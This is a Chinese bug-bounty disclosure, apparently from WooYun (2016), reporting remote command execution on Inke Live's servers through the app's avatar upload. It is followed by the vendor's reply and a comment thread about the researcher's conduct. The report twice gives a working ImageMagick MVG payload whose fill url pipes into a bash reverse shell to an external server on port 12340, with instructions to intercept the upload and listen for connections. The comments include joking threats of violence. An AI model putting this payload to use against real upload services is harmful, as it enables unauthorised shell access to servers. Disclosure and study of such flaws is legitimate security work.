映客直播APP存在命令执行（多台服务器）

app头像上传处

传一张图抓包

把图片的内容改为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'

pop graphic-context

服务器监听12340端口

没监听一次就会有一个不同的ip

app头像上传处

传一张图抓包

把图片的内容改为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/外网服务器ip/12340 0>&1")'

pop graphic-context

服务器监听12340端口

没监听一次就会有一个不同的ip

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2016-05-08 21:48

厂商回复：

感谢关注映客安全。这个漏洞我们之前已经了解并且处理。在处理过程中小伙子就在各种反弹shell，我们处理了反弹连接后还不死心继续弹数十次。小伙子想干啥？大半夜的让不让人睡觉了？抓到打死，不死也要残废。

最新状态：

暂无

1. 2016-05-08 22:09 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   2

   @ 建议直接找管理员吧。。。各种反弹shell。。。

   1# 回复此人

2. 2016-05-08 22:16 | 映客直播(乌云厂商)

   0

   @随风的风 现在还能反弹？ 如果可以反弹 留个联系方式，可否？

   2# 回复此人

3. 2016-05-08 22:19 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号：233sec 不定期分享各种漏洞思...)

   2

   @映客直播 不是这个意思。。我是指这个白帽有点过了。。懂否？

   3# 回复此人

4. 2016-05-08 22:31 | 头晕脑壳疼 ( 普通白帽子 | Rank:864 漏洞数:170 )

   1

   我提交后没有反弹过，谢谢

   4# 回复此人

5. 2016-05-08 23:07 | 头晕脑壳疼 ( 普通白帽子 | Rank:864 漏洞数:170 )

   0

   @随风的风 你怎么知道是我，睁眼瞎？你怎么知道不是我提交后别人就没有测试？

   5# 回复此人

6. 2016-05-09 00:41 | mango ( 核心白帽子 | Rank:2185 漏洞数:312 | 解决问题的第一步，是要承认问题的存在。)

   0

   @头晕脑壳疼 搬出来不就好了么~

   6# 回复此人

7. 2016-05-09 00:52 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

   1

   抓起来,弹JJ弹到死,让那个家伙再弹, ^_^

   7# 回复此人

8. 2016-05-09 06:33 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

   0

   @头晕脑壳疼 以为你被打死了 群里不见人影

   8# 回复此人

9. 2016-05-09 10:11 | Sevck ( 路人 | Rank:2 漏洞数:2 )

   0

   白帽子这么做就不地道了吧

   9# 回复此人

10. 2016-05-09 10:32 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄，只分高低！)

    0

    @映客直播 抓到要被打死，哈哈哈，我可不敢搞眏客，会被打死

    10# 回复此人

11. 2016-05-09 10:33 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | 乌云指定IDC)

    0

    前排占位广告 Krypt机房云服务器双倍内存和硬盘，2GB内存云服务器只要￥99 http://www.80host.com/cloud.html

    11# 回复此人

12. 2016-05-09 10:34 | 屠夫 ( 路人 | Rank:8 漏洞数:3 | 乌云最帅的白帽子)

    0

    @映客直播 看到映客的漏洞 以后要绕道走 抓到会被打死

    12# 回复此人

13. 2016-05-09 10:40 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

    0

    吓得我映客的漏洞都不敢挖了 怕被打死

    13# 回复此人

14. 2016-05-09 10:51 | 红客十年 ( 普通白帽子 | Rank:392 漏洞数:80 | 去年离职富士康，回到家中上蓝翔，蓝翔毕业...)

    0

    吓得我映客的漏洞都不敢挖了 怕被打残废

    14# 回复此人

15. 2016-05-09 10:59 | little_bird ( 路人 | Rank:1 漏洞数:1 | 低调求发展)

    0

    吓得我映客的漏洞都不敢挖了 怕被打残废

    15# 回复此人

16. 2016-05-09 11:49 | 纽伊斯特 ( 路人 | Rank:8 漏洞数:4 | 有的人活着，他已经死了。)

    0

    吓得我映客的漏洞都不敢挖了 怕被打残废

    16# 回复此人

17. 2016-05-09 11:50 | Lykan算什么 ( 路人 | Rank:6 漏洞数:2 | 这家伙太叼，什么都没有留下。)

    0

    吓得我映客的漏洞都不敢挖了 怕被打残废

    17# 回复此人

18. 2016-05-09 12:36 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    0

    卧槽！这个漏洞因为厂家一句话火了，传遍了黑客群。。。

    18# 回复此人

19. 2016-05-09 12:54 | 1c3z ( 普通白帽子 | Rank:307 漏洞数:64 | @)!^)

    0

    恭喜吸引了一波仇恨。

    19# 回复此人

20. 2016-05-09 15:02 | ze0r ( 路人 | Rank:0 漏洞数:1 | ..)

    0

    @头晕脑壳疼 你可知道，你这标题，让多少人本来不知道哪里有漏洞的，也知道那里有漏洞了，你确定你是在做好事？你这标题，在厂商未回应之前，知道吸引了多少人搞映客吗？

    20# 回复此人

21. 2016-05-09 20:48 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄，只分高低！)

    0

    @红客十年 我也是醉了，抓到直接打死，不需要我同意！

    21# 回复此人

22. 2016-05-10 14:56 | waking-云狐 ( 实习白帽子 | Rank:34 漏洞数:5 | WAKINGTEAM 深圳智可网络科技有限公司)

    0

    吓得我映客的漏洞都不敢挖了 怕被打残废

    22# 回复此人

23. 2016-05-10 15:46 | 达子 ( 路人 | Rank:6 漏洞数:3 | 寒冷到了极致，太阳就要光临)

    0

    小伙子不要被抓到啊

    23# 回复此人

24. 2016-05-11 07:39 | A lonely heart孤心 ( 路人 | Rank:10 漏洞数:4 | 技术不分年龄，只分高低！)

    0

    @红客十年 加我好友！！

    24# 回复此人

25. 2016-05-14 13:54 | 帅气的王尼玛 ( 路人 | Rank:2 漏洞数:1 | 没什么好介绍的)

    0

    哈哈哈哈抓到打到死可以可以厂商真牛逼，怎么能打到死他这么喜欢弹应该弹JJ到死QAQ

    25# 回复此人

26. 2016-06-22 22:31 | Karblue ( 路人 | Rank:0 漏洞数:1 | 10个注入9个坑)

    0

    可以。打死

    26# 回复此人